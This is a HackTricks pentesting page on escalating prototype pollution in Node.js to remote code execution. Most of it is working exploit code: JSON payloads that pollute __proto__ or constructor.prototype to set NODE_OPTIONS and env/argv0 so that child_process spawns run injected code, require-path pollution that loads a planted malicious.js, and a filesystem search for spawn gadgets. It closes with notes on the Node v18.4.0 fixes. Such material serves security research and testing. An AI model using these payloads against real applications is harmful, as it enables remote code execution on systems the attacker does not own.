HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
๐Ÿ•ธ
Pentesting Web
Prototype Pollution to RCE
Support HackTricks and get benefits!

Vulnerable Code

Imagine a real JS using some code like the following one:
const { execSync, fork } = require('child_process');
โ€‹
function isObject(obj) {
console.log(typeof obj);
return typeof obj === 'function' || typeof obj === 'object';
}
โ€‹
// Function vulnerable to prototype pollution
function merge(target, source) {
for (let key in source) {
if (isObject(target[key]) && isObject(source[key])) {
merge(target[key], source[key]);
} else {
target[key] = source[key];
}
}
return target;
}
โ€‹
function clone(target) {
return merge({}, target);
}
โ€‹
// Run prototype pollution with user input
// Check in the next sections what payload put here to execute arbitrary code
clone(USERINPUT);
โ€‹
// Spawn process, this will call the gadget that poputales env variables
// Create an a_file.js file in the current dir: `echo a=2 > a_file.js`
var proc = fork('a_file.js');

PP2RCE via env vars

According to this writeup when a process is spawned with some method from child_process (like fork or spawn or others) it calls the method normalizeSpawnArguments which a prototype pollution gadget to create new env vars:
//See code in https://github.com/nodejs/node/blob/02aa8c22c26220e16616a88370d111c0229efe5e/lib/child_process.js#L638-L686
โ€‹
var env = options.env || process.env;
var envPairs = [];
[...]
let envKeys = [];
// Prototype values are intentionally included.
for (const key in env) {
ArrayPrototypePush(envKeys, key);
}
[...]
for (const key of envKeys) {
const value = env[key];
if (value !== undefined) {
ArrayPrototypePush(envPairs, `${key}=${value}`); // <-- Pollution
}
}
Check that code you can see it's possible en poison envPairs just by polluting the attribute .env.

Poisoning __proto__

Note that due to how the normalizeSpawnArguments function from the child_process library of node works, when something is called in order to set a new env variable for the process you just need to pollute anything. For example, if you do __proto__.avar="valuevar" the process will be spawned with a var called avar with value valuevar.
However, in order for the env variable to be the first one you need to pollute the .env attribute and (only in some methods) that var will be the first one (allowing the attack).
That's why NODE_OPTIONS is not inside .env in the following attack.
const { execSync, fork } = require('child_process');
โ€‹
// Manual Pollution
b = {}
b.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/pp2rce').toString())//"}
b.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
โ€‹
// Trigger gadget
var proc = fork('./a_file.js');
// This should create the file /tmp/pp2rec
โ€‹
โ€‹
// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce\\\").toString())//"}}}')
โ€‹
clone(USERINPUT);
โ€‹
var proc = fork('a_file.js');
// This should create the file /tmp/pp2rec

Poisoning constructor.prototype

const { execSync, fork } = require('child_process');
โ€‹
// Manual Pollution
b = {}
b.constructor.prototype.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//"}
b.constructor.prototype.NODE_OPTIONS = "--require /proc/self/environ"
โ€‹
proc = fork('a_file.js');
// This should create the file /tmp/pp2rec2
โ€‹
โ€‹
// Abusing the vulnerable code
USERINPUT = JSON.parse('{"constructor": {"prototype": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}}}')
โ€‹
clone(USERINPUT);
โ€‹
var proc = fork('a_file.js');
// This should create the file /tmp/pp2rec2

PP2RCE via env vars + cmdline

A similar payload to the previous one with some changes was proposed in this writeup. The main differences are:
  • Instead of storing the nodejs payload inside the file /proc/self/environ, it stores it inside argv0 of /proc/self/cmdline.
  • Then, instead of requiring via NODE_OPTIONS the file /proc/self/environ, it requires /proc/self/cmdline.
const { execSync, fork } = require('child_process');
โ€‹
// Manual Pollution
b = {}
b.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/pp2rce2').toString())//"
b.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
โ€‹
// Trigger gadget
var proc = fork('./a_file.js');
// This should create the file /tmp/pp2rec2
โ€‹
โ€‹
// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce2\\\").toString())//"}}')
โ€‹
clone(USERINPUT);
โ€‹
var proc = fork('a_file.js');
// This should create the file /tmp/pp2rec

PP2RCE vuln child_process functions

In this section where are going to analyse each function from child_process to execute code and see if we can use any technique to force that function to execute code:
exec exploitation
execFile exploitation
fork exploitation
spawn exploitation
execFileSync exploitation
execSync exploitation
spawnSync exploitation

Forcing Spawn

In the previous examples you saw how to trigger the gadget a functionality that calls spawn needs to be present (all methods of child_process used to execute something calls it). In the previous example that was part of the the code, but what if the code isn't calling it.

Controlling a require file path

In this other writeup the user can control the file path were a require will be executed. In that scenario the attacker just needs to find a .js file inside the system that will execute a spawn method when imported. Some examples of common files calling a spawn function when imported are:
  • /path/to/npm/scripts/changelog.js
  • /opt/yarn-v1.22.19/preinstall.js
  • Find more files below
The following simple script will search for calls from child_process without any padding (to avoid showing calls inside functions):
find / -name "*.js" -type f -exec grep -l "child_process" {} \; 2>/dev/null | while read file_path; do
grep --with-filename -nE "^[a-zA-Z].*(exec\(|execFile\(|fork\(|spawn\(|execFileSync\(|execSync\(|spawnSync\()" "$file_path" | grep -v "require(" | grep -v "function " | grep -v "util.deprecate" | sed -E 's/.{255,}.*//'
done
# Note that this way of finding child_process executions just importing might not find valid scripts as functions called in the root containing child_process calls won't be found.
Interesting files found by previous script

Setting require file path via prototype pollution

The previous technique requires that the user controls the path of the file that is going to be required. But this is not always true.
However, if the code is going to execute a require after the prototype pollution, even if you don't control the path that is going to be require, you can force a different one abusing propotype pollution. So even if the code line is like require("./a_file.js") or require("bytes") it will require the package you polluted.
Therefore, if a require is executed after your prototype pollution and no spawn function, this is the attack:
  • Find a .js file inside the system that when required will execute something using child_process
    • If you can upload files to the platform you are attacking you might upload a file like that
  • Pollute the paths to force the require load of the .js file that will execute something with child_process
  • Pollute the environ/cmdline to execute arbitrary code when a child_process execution function is called (see the initial techniques)

Absolute require

If the performed require is absolute (require("bytes")) and the package doesn't contain main in the package.json file, you can pollute the main attribute and make the require execute a different file.
exploit
malicious.js
// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab
โ€‹
// Install package bytes (it doesn't have a main in package.json)
// npm install bytes
โ€‹
// Manual Pollution
b = {}
b.__proto__.main = "/tmp/malicious.js"
โ€‹
// Trigger gadget
var proc = require('bytes');
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist
โ€‹
โ€‹
// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"main": "/tmp/malicious.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_absolute\\\").toString())//"}}')
โ€‹
clone(USERINPUT);
โ€‹
var proc = require('bytes');
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
const { fork } = require('child_process');
console.log("Hellooo from malicious");
fork("anything");

Relative require - 1

If a relative path is loaded instead of an absolute path, you can make node load a different path:
exploit
malicious.js
// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab
โ€‹
// Manual Pollution
b = {}
b.__proto__.exports = { ".": "./malicious.js" }
b.__proto__["1"] = "/tmp"
โ€‹
// Trigger gadget
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist
โ€‹
โ€‹
// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_exports_1\\\").toString())//"}}')
โ€‹
clone(USERINPUT);
โ€‹
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
const { fork } = require('child_process');
console.log("Hellooo from malicious");
fork('/path/to/anything');

Relative require - 2

exploit
malicious.js
// Create a file called malicious.js in /tmp
// Contents of malicious.js in the other tab
โ€‹
// Manual Pollution
b = {}
b.__proto__.data = {}
b.__proto__.data.exports = { ".": "./malicious.js" }
b.__proto__.path = "/tmp"
b.__proto__.name = "./relative_path.js" //This needs to be the relative path that will be imported in the require
โ€‹
// Trigger gadget
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js
// The relative path doesn't even need to exist
โ€‹
โ€‹
// Abusing the vulnerable code
USERINPUT = JSON.parse('{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_exports_path\\\").toString())//"}}')
โ€‹
clone(USERINPUT);
โ€‹
var proc = require('./relative_path.js');
// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
const { fork } = require('child_process');
console.log("Hellooo from malicious");
fork('/path/to/anything');

VM Gadgets

In the paper https://arxiv.org/pdf/2207.11171.pdf is also indicated that the control of contextExtensions from some methods of the vm library could be used as a gadget. However, as the previous child_process methods, it has been fixed in the latest versions.

Fixes & Unexpected protections

Please, note that prototype pollution works if the attribute of an object that is being accessed is undefined. If in the code that attribute is set a value you won't be able to overwrite it.
In Jun 2022 from this commit the var options instead of a {} is a kEmptyObject. Which prevents a prototype pollution from affecting the attributes of options to obtain RCE. At least from v18.4.0 this protection has been implemented, and therefore the spawn and spawnSync exploits affecting the methods no longer work (if no options are used!).
In this commit the prototype pollution of contextExtensions from the vm library was also kind of fixed setting options to **kEmptyObject ** instead of {}.

References

Support HackTricks and get benefits!
Copy link
On this page
Vulnerable Code
PP2RCE via env vars
Poisoning __proto__
Poisoning constructor.prototype
PP2RCE via env vars + cmdline
PP2RCE vuln child_process functions
Forcing Spawn
Controlling a require file path
Setting require file path via prototype pollution
VM Gadgets
Fixes & Unexpected protections
References